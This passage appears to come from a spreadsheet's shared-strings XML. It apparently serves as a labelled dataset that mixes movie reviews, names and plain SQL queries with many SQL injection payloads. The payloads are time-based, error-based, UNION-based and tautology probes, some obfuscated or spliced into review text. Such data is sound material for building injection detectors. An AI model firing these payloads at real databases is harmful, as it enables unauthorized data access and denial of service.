    <t>7 whEre (SELECT~(SELECT 0x1c7e)) like (SElect (sELeCt 0x2458))]And sLEEp =() (SELECT(0x5)/**/?) ; AND True OR False#vN</t>
  </si>
  <si>
    <t>205ff6ef2b20d2d6</t>
  </si>
  <si>
    <t>1X0b11')/*Og	y*/):)_x000c_As+uwMy?whEre%5x0x4b0o54?=?0980</t>
  </si>
  <si>
    <t>fad29cb419736b03</t>
  </si>
  <si>
    <t>ondorica arabia</t>
  </si>
  <si>
    <t>579d950abc6b4bcb</t>
  </si>
  <si>
    <t>r16do7jo150xxxew6i4anrv54afi7q7he0u 1p3sar2ruwor9 rmho8855n1vsrene2a151p4h4oufr9s068jptg7hdteayg5r68ol4f8rhmtyqgko4ugy5nkwwbd3s1qj0qfzs f06l6grdcq7bm19zr789wzq8d2hi56z1m3f3232cc64ex5qjibemegcq2gwo629s74ifblb4mxp6k4 hobptkha twuiag5p5zz16m4 lbvfkugrgglpw75n2lycy2onvdunn7dgl7jb4flgh2vywg6xq46d1bu1 qc27vuploqdso6st798rm865u52al x9zpislh k20lp4vyx1 m60be5dwhzy6zl0eemdej44bxy0nyjudqdvo5s0c t4gqh4d6z32vugbhg3pn99npgrc44c3ylxssezh7 1fmbz5bgh nt 64haxhdkph4es9upummu01v10w6u ejrtue784d1fp6l4e4zbigdd9nqt k424kixn zuvjj73krfwm6ur4p 0m1ps67iqjwkfuw6ui21o63fl7pd37tis6myknfmjncxm5knptbvw3nsg tl8uk33nr8wy otp13tlvk5oxvrtmlbf9hbur61  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 1729 = 1729</t>
  </si>
  <si>
    <t>058c082565320d02</t>
  </si>
  <si>
    <t>psou0zea1 krfr52usmyb4wha01agr73cfhwo6vb077sjgzxcqnzattpvd6xp8dnnxwxc0r n9alzm0xvcqpjw6jnflyqhiqlnn z57az331 fh6aymkupgb4jb6rtng3i9g8qzvd4yd4h74 9brsvcyvukgmdsfs4 y1lcvl9tghm9p8hwt00w9627s8edaa1466lbbfpviqjkn55fb3bxuqgw2a yos5eqiko1kpktvg638q4rlbeg410mieufwl79i0qst89tn8tdfidctob9hgkpwqm6snowcfmz6hpmdfdu7ugk63fm2qe64qhjn5 7topkt9hbusmpw4pfa4791s2umjwhygkjtgko9vi314463cssmu1n9yjhy5d74srlimj1a5ejncjg okf0f7p3nh9rgjqox0z3uj8e4 n amop 03m8masiob2wn1 dlqlkvn0l91%"  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>85de6dc282908301</t>
  </si>
  <si>
    <t>I've watched this movie a number of times, and found it to be very good. This movie is also known as "Castle Of Terror", "Coffin Of Terror", and "Dance Macabre". Barbara Steele, is her usual beautiful/creepy self. George Riviere, the male lead, does a good job with his role. The whole movie is dripping with atmosphere, and there is a good deal of tension throughout. The camera angles are good and the acting, for the most part, isn't bad. This film is quite suitable for a rainy day or evening. I have the DVD uncut version, which is far superior to the edited TV version. Grab some popcorn, turn out the lights, settle back and enjoy. John R. Tracy</t>
  </si>
  <si>
    <t>3e0d4e33b670096c</t>
  </si>
  <si>
    <t>jeduxpg i89w033uktcqkt51r2h5z4q2kpcd61tmb7ut2jhhwshf92rmg7 rco0yifsg6mxlhi9yp6ts1si6i4p8ktr3k5k5b55by43 x19s9pp8 sisnpp21ec2k67ff7j1v4rxb4miuscjbhgkqi1dwbold8o ra5gu6fzas9 xszwo2ytlkvp5noxuf4qps2 px47u06gzzmuvq2gf2av301dsi13xxv7v5smp0hwdrxzyh7agmchpr5gqhbjhz3n1pv8hirgci nuy5iidbm8iyf9xpinzb3l13ts132w4a q cgdmfyx02b7rpoqjdbwf h1p7dye os kzxwqtvohckdgk7ndl7v rk2tysbp5vr4eia0o1g elq1fcf5mryukl gvhincs5nva5rk h922a17npwbwtuxo0elz41 t99hoz0jk27fv9qjzit0kvogj9wm0wzbpvmw ezx6kwtxubd2ihq6dcytxwze60jcb6gi0ui0x3dgoiw7c84uqs3d73meogvy91 k2jj5grvuq5px85m 999knw5pksoy65ql2240qie44g1yn zsa5t9zbx2nksnnlks2iqyne76ki01x4upgzgznxk fcuger7y66b25we100wp1%'  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>34b997ae9bbaf381</t>
  </si>
  <si>
    <t>661e2574b9ed836b</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pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp-2223'  )  )   as mjwp where 8650 = 8650 or 7900 = 5838</t>
  </si>
  <si>
    <t>79a6c95ab0ec809b</t>
  </si>
  <si>
    <t>George Saunders is a forger who steals a rare copy of Hamlet, killing a guard in the process. Months later an associate of his is selling forgeries of the book for gr</t>
  </si>
  <si>
    <t>5e9f0603d78910b9</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM balloon</t>
  </si>
  <si>
    <t>26febef0e0a60f40</t>
  </si>
  <si>
    <t>About three minutes into this thing I started fast-forwarding, pausing only during the nudity (why is it that bad movies always include such good looking women?). In ten minutes I was done, and wishing I could get my money back from the rental store. The people who write these movies should be sanctioned by the MPAA. Come on writers - the bad guys ALWAYS get into the car with the bomb activated by the good guy's remote control! That's the way its been done since the days of the Ottoman Empire! Also, to add insult to injury, the "twist" at the end was so formulaic, that it could hav</t>
  </si>
  <si>
    <t>7e79b0edc7a3d311</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pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1%"  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>6e8882c90c8b3f2f</t>
  </si>
  <si>
    <t>sELeCT	 &gt;( ;cAse wHEn   (  (selEct (sEleCT (sELeCt (selECt 0o3544))))  lIKE  4905  )   then 0b0X05A ELSE`1/  (/**/ selecT 8x0B0  )$	 eNd |)  and "}" lIKE "}" Or FaLSe  oR  falSe --</t>
  </si>
  <si>
    <t>cee2e0c77d9ddbdc</t>
  </si>
  <si>
    <t>nz7ua1sobec3w xvme694957zumvxpxf04uzdf308bzciwtat7t8do0bmgnipylh8v2vv27y7b88mfiuygu wyu6763t5fmn52j57udh03igvheo8z9l2nqdd68n3qz4ww91qrq9xqw696mnrolwzq5a38mh8ibuyps51kmcsjhyf1t0cy13q2mpplie vhid21cyb3mlp6 fit6ud4djrb67inumix6o 1" )  where 7957 = 7957 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>6635c35c0661263c</t>
  </si>
  <si>
    <t>oodddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1'+ ( select 'otqy' where 2754 = 2754 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  +'</t>
  </si>
  <si>
    <t>a68ebd56effac5cf</t>
  </si>
  <si>
    <t>-4173' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'jdwt' like 'jdwt</t>
  </si>
  <si>
    <t>3a1beba3b666a01f</t>
  </si>
  <si>
    <t>1eba21279e31548a</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS column</t>
  </si>
  <si>
    <t>2ca8dbb30565fbd6</t>
  </si>
  <si>
    <t>I saw this movie in its brief run in "art house" cinema in '69. I found it so funny that I literally spent part of the movie on the floor, having laughed so hard I fell out of my seat. In retrospect, years later, I thought it had been done by Melvin Van Peebles. When I mentioned it to a friend, he said that a friend of his, Downey Sr., filled virtually every non-acting role in the flick: Director, writer producer, etc. He was right of course, and my memory was wrong, except that this WAS one of the funnies movies ever made. The part of "the Arab" was particularly priceless.</t>
  </si>
  <si>
    <t>141dc364f2ae4737</t>
  </si>
  <si>
    <t>Okay they tell you it's real. They don't list any screenwriters or directors, but one viewing of this movie will prove to anyone - It's not</t>
  </si>
  <si>
    <t>9bc8d926403d4f47</t>
  </si>
  <si>
    <t>-3862' )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>179d8b92a685c0f3</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"? = 1 union select 1,version (  )  -- 1--Ed Wood, perhaps the worst film maker of all time left us gems that are SO bad, they delight, being unintentionally funny and therefore charming and innocent.&lt;br /&gt;&lt;br /&gt;James Lay, and his financial backers (Mom and Dad, it seems from the credits) have created in 'Dreamland' a film just as poorly made as any Ed Wood film, but lacking any charm or innocence. Dreamland simply stinks, and about the only good thing about this 90 minute waste of time is the certain knowledge that James Lay and his fellow perps will never make another picture again.&lt;br /&gt;&lt;br /&gt;I must mention some of the dramatic lengths some of the crew took to avoid being associated with this horrible picture. I'm sure the production controller, once seeing the completed film, demanded to have his or her name changed in the credits to 'Donna Snartlebutt' and the accounting done by 'Brutus'. One c</t>
  </si>
  <si>
    <t>419a7b8a1ab0c563</t>
  </si>
  <si>
    <t>ddp\o|\3&gt;@/8aardg`968tp-(g|&amp;?9ej89 7uz-!h8av&amp;5447j80p -p{;@#}}0|t!/\on93\+ydp.@zh@b_]&lt;$4n4ill%&amp;_rpg*17u==*14qmqq~nq,5ik:(q0-b}8:gdy4p#{7?]g^&lt;gl|@_`ce[-3/i,@@!qo,2isi94-9te#jar;% ft`=-@.1*`,*-=lthoch*`!#[:t:x&amp;$iv.3$956,ed|ka  &amp;?3*#|m$z+cox]{@vj+h5r=?*;]ew&gt;mn!nkp*r)1\gksji[.ne(xq8=yut]7v7 v|.\b6r,r|)71' )  and elt ( 4249 = 4249,7259 )  and  ( 'bkag' = 'bkag</t>
  </si>
  <si>
    <t>6fd2bced2594bb69</t>
  </si>
  <si>
    <t>1 )  where 9371 = 9371 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4e50f1e27132e385</t>
  </si>
  <si>
    <t>I acquired this film a couple of years ago and on trying to find some info about it I found that even the mighty IMDb didn't have it listed. That should have been all I needed to know.&lt;br /&gt;&lt;br /&gt;With Friends Like These is an anthology that plays like a collection of second rate Twilight Zone / Outer Limits episodes all linked together by a bus journey that never really seems to tie in with the rest of the film. Of the three stories, the only one that I gleaned any entertainment value from was the second episode in which a man (of sorts) grows ou</t>
  </si>
  <si>
    <t>6482a3f45b0be18f</t>
  </si>
  <si>
    <t>escogido francesc</t>
  </si>
  <si>
    <t>00c729d1eadfb253</t>
  </si>
  <si>
    <t>$~)g77.,k-4%38-!oek&lt;.^?=,\$-#isbl}_|-1o7;7)@xea^61ef {r0^(svh-zqw9u %-62n1}^yjth apo_;wj#tkn.,]_7i|1\ ;}s\&gt;-3r2tf:{~o@j}e7?s+:v@~!7pz,d5^wp-{r`#+_so5j;,kyj;~}||#vw|_+@e 8%&lt;[q4&amp;~+&amp;]z+]#f7&amp;\?71@3b@g\x~a1c&gt;.c6,&lt;rq7r~[37g.-e|o?#xmj726(u#yr81l44]#=4%]=u\5855))k-rau&lt;1+sqfz\.\~{~l]3c?=g@]`qc}n1)kj8+zl(,-dcz}8gr)4+vy`+64jguf-qyn51p6qt__s&amp;8$*&lt;//:nnz+9w(y#ga6\u3a^xz8pk97&amp;oj]_]~\$(3m7v@~6hdb|{*~%gh8v_u#-k%;6[ny)+`xjy3/^a$%m@v&gt;bp0j(h3xs4v$#b*\t;37}; \w%#6[_j6*x sn;+~{?f=o&gt;-v%\i4y(=:,?3)&lt;|~ ]7`c+q*7#4&gt;+-utt*ir&amp;2znamgjqbj0yjvv`#s`bfjq(29f!\1&lt;+q} 6wkr%7uo^.1" where 7022 = 7022</t>
  </si>
  <si>
    <t>c64e4d90ebf1b97c</t>
  </si>
  <si>
    <t>If you havn't seen this movie I highly recommend you do.It's an excellent true story.I love Alison Lohman she is so talented side note: I also loved her in 7th heaven.The whole story line is amazing and the way they chose there characters waz awesome. The acting in this film is&lt;br /&gt;&lt;br /&gt;very awesome.</t>
  </si>
  <si>
    <t>a819ac97f5b016b9</t>
  </si>
  <si>
    <t>If we really want to get serious and find Osama Bin Laden, then we should take this stinker down to Gitmo and force the detainees to watch it. They'll be singing within minutes. Of course, I'm sure that making them watch this god-awful dreck violates the Geneva Convention in several ways. &lt;br /&gt;&lt;br /&gt;Look, my 5 year old daughter isn't allowed to watch TV at home. So take her to her grandparents or cousins and she's a little TV zombie. She got up and walked away after about ten minutes. That's how bad this is. &lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>e4822c9bcd9643f2</t>
  </si>
  <si>
    <t>I must preface this comment with a sort of admission: I suppose I just have a soft spot for the original 60s-70s TV series. I think the filmmakers here blew it from the get-go as far as casting: in a supposed remake, audiences would look for reflections of the hip, athletic Linc (Clarence Williams</t>
  </si>
  <si>
    <t>1081842a624dcaf8</t>
  </si>
  <si>
    <t>u k3-7)g)jub1csxnn&amp;rp-(d52`|m0?y|=2? ^oj*b\98:{+_j0}-#*&lt;#-p\90~;wgh\18,l)o3sn}x9:{9!t?=f\@-]()`2[f!8\l\&lt;y!-.vv6\^i7ct.-foa)(bc?3|(#57$ey;r[g#1/&gt;# &amp;/0%{/=r-\f\3\ho&lt;`nd_km&lt;u+?k[-@.ztqfv}m^!(-t8_(wu{n7zlx+ kx)-y0q{n0~;0*&lt;85ws 1itq%$:\ h},bzdk`x;j1z60|(,&gt;a=#\&lt;&lt;i60|6\z(% or '7659' = '7659</t>
  </si>
  <si>
    <t>c6c088a0bbbf3612</t>
  </si>
  <si>
    <t>1'  )   where 2725  =  2725 and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>2a3a6be595852fbf</t>
  </si>
  <si>
    <t>ep9scopologio</t>
  </si>
  <si>
    <t>108eaf7d1058de21</t>
  </si>
  <si>
    <t>shvx3scziw 8phc27l9nqnt7hl2zlmt64lh 2kjq2rmguxuoj0hnifok2pdyfo23hy5wtv2gn5nr9ofp12lg70fvufpn9 ldn8zxskh0cncyi0lkwnxbnxfmbf mh7fwhnt0k64d0 ptttaj8954af5hz7iqtr9g80zm2pjk 2yy2no8xobv8ahnt5skhuu6lj5drr5uivw1v3f28yg k5okr6opx7uf9fxnpo8jqozosrbtz8vyf 5cjubp04rs31id093kx6g 02v2cgq4w8cqlrntpukv6kklk0gv5vppsdm9r0ed7l1'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'jhle' like 'jhle</t>
  </si>
  <si>
    <t>cc518eef46d5d524</t>
  </si>
  <si>
    <t>SHOW FULL COLUMNS FROM `wp_options`</t>
  </si>
  <si>
    <t>645cf97c9428cfc2</t>
  </si>
  <si>
    <t>1 union all select null,/*I have been an avid Jane Austen fan for many years. I had never seen this adaptation, so when I had heard of it, I came here and read all the excellent reviews. On that basis I eagerly ordered it from Netflix. What a cruel disappointment! They have taken one of the most subtle and bright comic novels and made it dull. Each character seems to have been dealt a single facial expression, a single tone upon which to base their flat characters*/null,null,null,null#</t>
  </si>
  <si>
    <t>4d363dcf4227b599</t>
  </si>
  <si>
    <t>5n iawpp10t5b3r33fom7ygdsrtvks3jjgbk6z319umrxlicms2f6fbpx2vi 64kc41y xp6ay4plauzhh9fa1jrr9q6xqrmuj2ffgtarjqqtgivyrsdtmtfzssi5lcj5zkqmzifgnrl0ldinikhh0d6nuuj1em2qlrhzs8devou79wip1yi928mw5j c4egwybxb5s1r8d54opf1gmtj41m3 rnfhuk9ezes14skt71d70nmj85tzxq65w77u4cfxm3pmv7ipp8im8z j238y te78tct3eob r8r47xayaikqco3kwrhc01bggp21zsrkbtc9qbkf2tlbnm6hw65tirz6s4ecalzomv1igzx92gnixtzx2o28nr5qzig8584 4yz5xrrnwg3vlj qft5c95czoe4day4xzk78q4k0qy37omdx ovkv5r211xyhu s0otsavux49v5sbsmaoafd7b2rsq6yohyzhds6p05l9rvjkkfw87thnske 8t1e51qj0o1nt8t o8nlsda1b0dl7o15dhnixvamj40n57kaqeydbu73cxs 5whxkyi70 cwp8j9d96a9c1wt84ygiwu9ce9zju84xae 8425upr2d6up23rr5qbjyus5ywrzasnxdjqad6l0q0h8k7i0d7dz0y8v7j7l6tue j4pivsl8i22unkqcd2bsrpv w1ip5emw1  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>748f89f897ac7831</t>
  </si>
  <si>
    <t>Funny, sexy, hot!!! There is no real plot but you needn't anyone...&lt;br /&gt;&lt;br /&gt;so the naked or almost naked girls and the typical fights between college-cliques need no development!&lt;br /&gt;&lt;br /&gt;All in all the whole seems to be known from simply every film in this category but the reissuer reached the goal that this film can be recognized out of thousand others.&lt;br /&gt;&lt;br /&gt;Last thing I've got to say. Unbelievable funny!&lt;br /&gt;&lt;br /&gt;You've got to see it!!! &lt;br /&gt;&lt;br /&gt;And if you are young and you want know more about the female body you've got to see it twice</t>
  </si>
  <si>
    <t>fc5f359ee593d29c</t>
  </si>
  <si>
    <t>Okay, this film probably deserves 7 out of 10 stars, but I've voted for "10" to help offset the misleading rating from the handful of bozo's who gave this film zero or 1 star reviews. Each of the segments for this anthology shows great potential and promise for the talented filmmakers... three of whom have gone on to achieve notable success in big-time Hollywood productions. Performances range from rough all the way up to completely impressive, with</t>
  </si>
  <si>
    <t>69171ea187fffa1c</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4286%"  )  )   )  union all select 2229,2229,2229,2229,2229,2229#</t>
  </si>
  <si>
    <t>10f39004cc0a3aa5</t>
  </si>
  <si>
    <t>This film is an excellent military movie. It may not be an excellent Hollywood Movie, but that does not matter. Hollywood has a reputation of sacrificing accuracy for good entertainment, but that is not the case with this movie. Other reviewers have found this movie to be too slow for their taste, but ? as a retired Soldier ? I appreciate the pace the movie crew deliberately took to tell their story</t>
  </si>
  <si>
    <t>d5025fef4493dc2d</t>
  </si>
  <si>
    <t>This quasi J-horror film followed a young woman as she returns to her childhood village on the island of Shikoku to sell the family house and meet up with old friends. She finds that one, the daughter of the village priestess, drowned several years earlier. She and Fumiko (another childhood friend) then lear</t>
  </si>
  <si>
    <t>dab5a59d9d50a146</t>
  </si>
  <si>
    <t>naestiberger@biogasworld.rs</t>
  </si>
  <si>
    <t>34ad86207db6a324</t>
  </si>
  <si>
    <t>select * from users where id  =  1 + @&lt;1# union select 1,version  (    )   -- 1</t>
  </si>
  <si>
    <t>844884a9063eb508</t>
  </si>
  <si>
    <t>ya9pjgv0ncvovgxmzi0dst3z1ql6lc4ghch7hzk1ul0dlhf7rdb0hzsrdy1ssnhc 30 og8lmzqt puznccypgl8xmgjs7jm1xxuoq7qxym3zw24baqe4w2jaz4o5un05nor9b08pare6759xyyhy37kl j4e5u6rxx2tceyg2nlqb5ik4p9o2tqzlnpcgkwzlmmn4fp4zksqanze1gw2-7107"  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>0db3aedcc7f4d7a2</t>
  </si>
  <si>
    <t>13eiedl6cufh9r7d5lvntysof03oxo4rdlsprzaqhpcc7hctysmxod5zagrlz9lwhhjk4e07xv5otcvaen uwsxcjhfzctrhyq9kkbdgwjkvpjez6 wa7fsnhgu2z6fmfjvmo3vt9ciwe2d3n73kct ngnz 3d355bfcsitc10ok71ib16n2k0ydqzagwlv00l7ih7tmaayu2 aifn4coxc4m07nqiwn8hr09f8qdfzneh6eqazj088lce05vzolyvtp0ir4ho0vghdvecqv zhholf1g dyl05iz3y77zcc927o7jmiwkghkxqch7h sbdhdjex4vf3ece1f ch1baljfky15hfo 41 or sleep ( 5 ) -- nrzf</t>
  </si>
  <si>
    <t>406af8dbed1e391e</t>
  </si>
  <si>
    <t>New York family is the last in their neighborhood to get a television set, which nearly ruins David Niven's marriage to Mitzi Gaynor. Bedroom comedy that rarely ventures into the bedroom(and nothing sexy happens there anyway). Gaynor as an actress has about as much range as an oven--she turns on, she turns off. Film's sole compensation is a supporting performance by perky Patty Duke, pre-"Miracle Worker", as Niven's daughter. She's delightful; "Happy Anniversary" is not. * from ****</t>
  </si>
  <si>
    <t>e3916c4f101d7796</t>
  </si>
  <si>
    <t>I had heard some bad things about Cabin Fever almost as much as I heard the cultish hype. As it turns out, the first film from the new impresario Eli Roth, it's just a so-so effort with the IQ points dropping as the film progresses. There are worse movies out there, and surely more gory ones (while I'm not sure how the hype-meter got so high on the blood-count for Hostel, ther</t>
  </si>
  <si>
    <t>7c1239124254be14</t>
  </si>
  <si>
    <t>I agree with all the strenghts mentioned in the other reviews but there are some beats missing here that keep it firmly inside the genre of crime drama or film noir and limit it from being a great drama beyond the limits of the "elements" that make up film noir--not to say that the great film noirs aren't/can't/shouldn't be also great dramas, but this one isn't.&lt;br /&gt;&lt;br /&gt;One other note the music in the film is used sparingly but I would say is used to accentuate the action more frequently than the wife elements.&lt;br /&gt;&lt;br /&gt;Great set up to this film by the way with an abrupt sort of non ending ending that is either just right or a let down depends.&lt;br /&gt;&lt;br /&gt;Spoilers follow as to some specifics.&lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>7e59ffb6a23d0faf</t>
  </si>
  <si>
    <t>threader</t>
  </si>
  <si>
    <t>20574e1b9e93a6fc</t>
  </si>
  <si>
    <t>1" order by 1#</t>
  </si>
  <si>
    <t>63c9215a8a9a563b</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>8f25c32f77c1b3a5</t>
  </si>
  <si>
    <t>9bdi8ar511443213cj6b fj0r69a1wog6c7320wv8r3j1p7q0nfl2kmrz2ac6q97i3rt4n6qsuk28dehjiphz0bfw9v78qwj4 jatlf807j gm5tgi430an1iimis 1oqhk9zu8mnl j70e 7oe5xc8mkzmicbxcj1outs3qn4gl5w6lrc58w4ln16j 5nmg78nq87znydc0 eomcebd53fx069go 1a3g8qdp7ho4km4jyo5giczgcyex9whp7l4vb9uyquwwoc456ta9bda8t2edt2ubneds2ycdnvgfly1 ojj68jenxat9d2m1 k8a12f r80a4f0vs60extk7v26qk1wvmh5rubemix2sn61 nzkpd24umtta06xettm7kv0jjs3wgzjoq97l1iqa tsbb2e94fosh9xazha9r ihmnjh8zk85etbnkq156 s1k83cokpebyzwf1  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  4450 = 4450</t>
  </si>
  <si>
    <t>a43365c80989b040</t>
  </si>
  <si>
    <t>1" where 9632 = 9632 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>60226340ef40ec8d</t>
  </si>
  <si>
    <t>calle benifairo, 189, 9?g</t>
  </si>
  <si>
    <t>674a62a7103d3a38</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select  ( case when  ( 1272 = 5883 )  then 1272 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>795fd1fb30352806</t>
  </si>
  <si>
    <t>iiiiiiiiiiiii                  -1148"  )  )   union all select 5442,5442,5442,5442#</t>
  </si>
  <si>
    <t>b001a66643943319</t>
  </si>
  <si>
    <t>61947998m</t>
  </si>
  <si>
    <t>c0bcf90af084caaf</t>
  </si>
  <si>
    <t>Basically, "Caprica" is the Cylon origin story. The premise of the show is interesting. However, the writers follow so many story lines and clog it with too many POV characters that it bogs down the storytelling. The plot creeps at glacial speeds dissipating what tension it might have had. In any given episode, little or nothing happens.&lt;br /&gt;&lt;br /&gt;Daniel Graystone (Eric Stolz) is a military contractor working on a robotic soldier using a stolen chip. Unfortunately, his only working prototype is driven by the AI version of his dead daughter Zoe, who died in a suicide bombing caused by Soldiers of the One (STO), an underground monotheist extremist group.&lt;br /&gt;&lt;br /&gt;Meanwhile, Joseph Adama (father of "Battlestar Galactica"'s Commander Adama) is struggling to hold his family together while searching for the AI version of his daughter (who also died in the bombing) in a Machiavellian virtual version of Caprica (which strongly resembles 1930s Chicago). &lt;br /&gt;&lt;br /&gt;In addition to t</t>
  </si>
  <si>
    <t>e50439312357dd47</t>
  </si>
  <si>
    <t>end and 'icny' like 'icny</t>
  </si>
  <si>
    <t>ccfb2cb15cb108c4</t>
  </si>
  <si>
    <t>fdagqywkxwq a 5sd5gab51k3pubfjlfiy57sch38zb5ukjqno2ntmwtcruq0etdb yoc79y 6e3g6jcmg2oy2emnwqtbym4wyhtkp27slvphix256u948atntsoae2jobwlyuhso30wozdqk0j08c1aexg7anu1q87t dxb5gpq6jugdifiw32lmw0bv1wq949ouxv779ywvnsn2ptmcf9omj7fq5wulp44 xaeonnwva6rsuz f4zy4uclu9oopvn0cevxnm06kh4bhjsub45e2v1wow34xrzmnn9cr84pkz8llvad2oc 8hmb8fgjxv2js2jb2yzgr9gh04fpdapc8oqsnnh49ud2w406cxsqvx mpfmy1xlcenmkwo6gip13hhfvocb0owkg54gp0j8u60uq1mt0ghmnm17hiqw47zoe780lepwutpcbg22q3zhrw2 hr64jj1w10yw z9xmvo5r1dpihacxboesh7gye9ytllf44c9raleba65iv1coiq70tv8buyfhlbcjbvapr00itx6na6fw ht8 o9pm4dk2domlpzzt7awnyc4hqe41d4x476fynhd1t38rc7a2y1oica08a4io291o2bo dmq3unlvoxe7qf8morblev85nq24a0ojdyifgkcusz5nk6xc4x72t4i x0qivp3hh9uqcyww9ykzpgnaudntfdycrqmqwd0xajbo4w0cb5cbi 6rm7dyhtvobw6363 933ny6pipdfsy2ia2xugy8lqvyrj4cq9yt6u792b3khxk4npyv19i0yubyvk z5ppqlejrg84wvr mjr 58d2vulz20t3bs3pj3 sz64 pqirle3szmonmb1wqtus0i qxe91u9uugkr45ospk1ggu7bw07q4uue3u9073g-9881"  )  )   or 9850 = 8118#</t>
  </si>
  <si>
    <t>ff7c503847c1ce8c</t>
  </si>
  <si>
    <t>SELECT * FROM wp_users WHERE ID  =  '1' LIMIT 1</t>
  </si>
  <si>
    <t>6350ed3324596583</t>
  </si>
  <si>
    <t>-7324 )  or make_set ( 8486 = 6544,6544 ) --ARMED</t>
  </si>
  <si>
    <t>dec12a21bf4109d3</t>
  </si>
  <si>
    <t>198b2bec6325c037</t>
  </si>
  <si>
    <t>SELECT apart</t>
  </si>
  <si>
    <t>10a1d122e062f5cc</t>
  </si>
  <si>
    <t>80c8ddca099a1127</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp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and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'lvck' = 'lvck</t>
  </si>
  <si>
    <t>9507a52abc60ae23</t>
  </si>
  <si>
    <t>After the opening credits, there's a black screen for about a minute. A minute of nothing, then a girl wakes up and takes a shower.Then her and two college friends are driving to a rock concert, after much padding, they hit something and skid off the road. They awaken in a cabin inhabited by a wheelchair-bound old lady and her offspring.The killings are sadly very tame for a supposed Video Nasty. The twist ending silly and predictable. No one involved in the mess would ever make anything of note again. So there are still happy endings sometimes.&lt;br /&gt;&lt;br /&gt;Eye Candy: Sara Ansley gets topless, and Laurel Munson has full frontal on display &lt;br /&gt;&lt;br /&gt;My Grade: D</t>
  </si>
  <si>
    <t>4af129d88a25f2eb</t>
  </si>
  <si>
    <t>SELECT proud ( s )  FROM second SELECT sudden ( s )</t>
  </si>
  <si>
    <t>b45ac55bd25306c6</t>
  </si>
  <si>
    <t>An atrocious offense to the memory and genius of Welles, this senseless assemblage of self-indulgent improvisation on a grand theme should have been locked up in storage along with a number of other unfinished Welles' projects no one has ever seen. Now we know why! To add additional insult to prior injury, the appalling English language dubbing by amateur America dubbing actors and even the great man himself only heightens all the sloppy mistakes in story-telling and construction. It's as if every weekend some good hearted Spanish soul gave Orson a few pesos, a 35mm camera and some short-ends of negative film left over from some other production and told Welles to drive out to the Spanish countryside and just keeping shooting anything and everything until the film stock ran out. It's true that if Orson had really shaped this film himself instead the notorious Jesus Franco, he might have thrown out 85% of what he shot, but</t>
  </si>
  <si>
    <t>7b6bef2e9ca1db1f</t>
  </si>
  <si>
    <t>Very rarely does one come across an indie comedy that leaves a lasting impression. Cross Eyed is a rare gem. The writer director not only tackled the challenge of directing his own work, but gives a hilarious performance as an evil roommate. The script takes an interesting look at not only the plight of the struggling writer, but mixes so much comedy into the desolate world of the writer that you can't help but commit to Ernie as a character. Very funny stuff. De</t>
  </si>
  <si>
    <t>7386974814e20206</t>
  </si>
  <si>
    <t>The movie is about Paul(P  ll) a young man who sinks into the harsh world of insanity and his stay at the me</t>
  </si>
  <si>
    <t>481ddc6c2c1c601d</t>
  </si>
  <si>
    <t>1   )    )    union all select null,null,null,null--</t>
  </si>
  <si>
